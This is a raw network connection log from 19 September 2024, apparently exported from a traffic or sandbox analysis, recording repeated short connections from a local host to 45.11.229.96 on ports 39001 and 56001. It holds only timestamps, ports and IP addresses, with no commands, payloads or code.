Sep 19, 2024 02:27:30.303164959 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.316302061 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.321072102 CEST	39001	49878	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.321130991 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.325962067 CEST	39001	49878	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.943797112 CEST	39001	49878	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:30.943881989 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.945661068 CEST	49878	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:30.950524092 CEST	39001	49878	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.063838959 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.068769932 CEST	39001	49879	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.068850040 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.167072058 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.172048092 CEST	39001	49879	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.172112942 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.176819086 CEST	39001	49879	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.708619118 CEST	39001	49879	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.708699942 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.708937883 CEST	49879	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.721018076 CEST	39001	49879	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.813894987 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.831466913 CEST	39001	49880	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.831626892 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.845375061 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.850246906 CEST	39001	49880	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:31.850320101 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:31.855698109 CEST	39001	49880	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:32.491158962 CEST	39001	49880	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:32.491246939 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.491337061 CEST	49880	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.496134043 CEST	39001	49880	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:32.611638069 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.616488934 CEST	39001	49881	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:32.616573095 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.633039951 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.637814999 CEST	39001	49881	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:32.637864113 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:32.642667055 CEST	39001	49881	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:33.266844034 CEST	39001	49881	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:33.269138098 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.269226074 CEST	49881	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.274029016 CEST	39001	49881	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:33.389059067 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.393975973 CEST	39001	49882	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:33.394085884 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.410074949 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.421509027 CEST	39001	49882	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:33.421629906 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:33.426548958 CEST	39001	49882	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.019829988 CEST	39001	49882	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.019896030 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.020128965 CEST	49882	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.024955988 CEST	39001	49882	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.129988909 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.141278982 CEST	39001	49883	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.141354084 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.183151007 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.187984943 CEST	39001	49883	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.188061953 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.192847013 CEST	39001	49883	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.786478996 CEST	39001	49883	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.786559105 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.786751986 CEST	49883	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.791563988 CEST	39001	49883	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.891966105 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.897516966 CEST	39001	49884	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.897634029 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.917346001 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.922990084 CEST	39001	49884	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:34.923048019 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:34.927886963 CEST	39001	49884	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:35.579129934 CEST	39001	49884	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:35.579269886 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.579365969 CEST	49884	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.584594011 CEST	39001	49884	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:35.691582918 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.696840048 CEST	39001	49885	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:35.696924925 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.711622000 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.716413975 CEST	39001	49885	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:35.716464996 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:35.721261978 CEST	39001	49885	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:36.338536024 CEST	39001	49885	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:36.338618994 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.338764906 CEST	49885	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.343733072 CEST	39001	49885	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:36.480465889 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.485321045 CEST	39001	49886	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:36.485404015 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.502785921 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.507822990 CEST	39001	49886	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:36.507977962 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:36.513199091 CEST	39001	49886	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.122756958 CEST	39001	49886	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.122987032 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.123147011 CEST	49886	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.131424904 CEST	39001	49886	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.237804890 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.247421980 CEST	39001	49887	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.247502089 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.504070044 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.509398937 CEST	39001	49887	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.513953924 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.518785000 CEST	39001	49887	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.878643990 CEST	39001	49887	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.878900051 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.879118919 CEST	49887	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.883923054 CEST	39001	49887	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.987401962 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:37.992304087 CEST	39001	49888	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:37.992389917 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.010615110 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.015505075 CEST	39001	49888	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.015593052 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.020360947 CEST	39001	49888	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.629698992 CEST	39001	49888	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.629760027 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.630717993 CEST	49888	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.635703087 CEST	39001	49888	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.751985073 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.757194042 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.757268906 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.793704033 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.798722029 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:38.798810959 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:38.803689003 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.446002007 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.446209908 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.446209908 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.446861982 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.446993113 CEST	49889	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.449628115 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:27:40.451134920 CEST	39001	49889	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.531819105 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:27:40.605439901 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.610286951 CEST	39001	49890	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.610352039 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.683268070 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.688903093 CEST	39001	49890	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:40.688963890 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:40.693911076 CEST	39001	49890	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:41.283241987 CEST	39001	49890	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:41.283409119 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.283550024 CEST	49890	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.289453983 CEST	39001	49890	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:41.392110109 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.396920919 CEST	39001	49891	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:41.400604010 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.468693972 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.474028111 CEST	39001	49891	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:41.476792097 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:41.481597900 CEST	39001	49891	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.049884081 CEST	39001	49891	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.049945116 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.050041914 CEST	49891	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.055371046 CEST	39001	49891	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.157716036 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.162625074 CEST	39001	49892	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.162693977 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.254837990 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.259756088 CEST	39001	49892	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.259814024 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.264607906 CEST	39001	49892	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.850358009 CEST	39001	49892	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.850414038 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.850534916 CEST	49892	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.855335951 CEST	39001	49892	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.970807076 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:42.975758076 CEST	39001	49893	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:42.975883961 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.123353958 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.128599882 CEST	39001	49893	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.128732920 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.133522034 CEST	39001	49893	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.641339064 CEST	39001	49893	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.644659996 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.648931026 CEST	49893	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.654407024 CEST	39001	49893	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.757123947 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.765131950 CEST	39001	49894	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.765311956 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.977622032 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.982574940 CEST	39001	49894	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:43.982706070 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:43.987679958 CEST	39001	49894	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:44.433568954 CEST	39001	49894	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:44.433646917 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.433796883 CEST	49894	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.439806938 CEST	39001	49894	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:44.548526049 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.555788994 CEST	39001	49895	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:44.555902004 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.965312004 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.971543074 CEST	39001	49895	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:44.973073006 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:44.978065968 CEST	39001	49895	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:45.180181026 CEST	39001	49895	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:45.180550098 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.180923939 CEST	49895	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.185760975 CEST	39001	49895	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:45.300510883 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.305706978 CEST	39001	49896	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:45.305852890 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.705048084 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.814260960 CEST	39001	49896	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:45.814413071 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:45.825964928 CEST	39001	49896	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.160577059 CEST	39001	49896	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.160650015 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.160765886 CEST	49896	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.165540934 CEST	39001	49896	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.282505989 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.287461042 CEST	39001	49897	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.287555933 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.323937893 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.332607985 CEST	39001	49897	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.332667112 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.338634968 CEST	39001	49897	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.672821999 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.677897930 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.677978039 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.682809114 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.920721054 CEST	39001	49897	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:46.920824051 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.920913935 CEST	49897	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:46.925957918 CEST	39001	49897	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.032558918 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.038908005 CEST	39001	49898	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.042290926 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.086898088 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.177258968 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.182195902 CEST	39001	49898	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.182466030 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.187517881 CEST	39001	49898	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.219300032 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.223474026 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.227293015 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.233879089 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.233963013 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.238848925 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.665250063 CEST	39001	49898	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.666277885 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.666387081 CEST	49898	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.671144962 CEST	39001	49898	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.811944008 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:47.817034960 CEST	39001	49899	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:47.817112923 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.433337927 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.438235998 CEST	39001	49899	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:48.438322067 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.443120956 CEST	39001	49899	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:48.790549040 CEST	39001	49899	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:48.790626049 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.790829897 CEST	49899	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.795692921 CEST	39001	49899	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:48.918884039 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.932327986 CEST	39001	49900	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:48.932420015 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:48.995723009 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.000514984 CEST	39001	49900	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.000607967 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.005479097 CEST	39001	49900	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.596756935 CEST	39001	49900	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.596834898 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.596939087 CEST	49900	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.601838112 CEST	39001	49900	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.705754042 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.710783005 CEST	39001	49901	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.711359978 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.746476889 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.753736019 CEST	39001	49901	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:49.753798962 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:49.758637905 CEST	39001	49901	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:50.372200012 CEST	39001	49901	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:50.374279022 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.374385118 CEST	49901	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.379199982 CEST	39001	49901	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:50.485657930 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.496891022 CEST	39001	49902	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:50.498287916 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.839020014 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.844194889 CEST	39001	49902	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:50.844290018 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:50.849065065 CEST	39001	49902	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.095532894 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.100641012 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.100698948 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.107508898 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.128868103 CEST	39001	49902	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.128951073 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.129039049 CEST	49902	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.133852959 CEST	39001	49902	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.237813950 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.243887901 CEST	39001	49903	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.243969917 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.349215984 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.353986025 CEST	39001	49903	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.354054928 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.358789921 CEST	39001	49903	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.581322908 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.719347000 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.721442938 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.723038912 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.727850914 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.727925062 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.732712030 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.915605068 CEST	39001	49903	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:51.915713072 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.915822983 CEST	49903	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:51.929646969 CEST	39001	49903	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.032660007 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.038238049 CEST	39001	49904	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.040838957 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.087336063 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.092751980 CEST	39001	49904	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.092814922 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.097604036 CEST	39001	49904	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.679764986 CEST	39001	49904	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.679817915 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.679933071 CEST	49904	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.685533047 CEST	39001	49904	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.812495947 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.817557096 CEST	39001	49905	45.11.229.96	192.168.2.6
Sep 19, 2024 02:27:52.817629099 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.847176075 CEST	49905	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:27:52.852916002 CEST	39001	49905	45.11.229.96	192.168.2.6
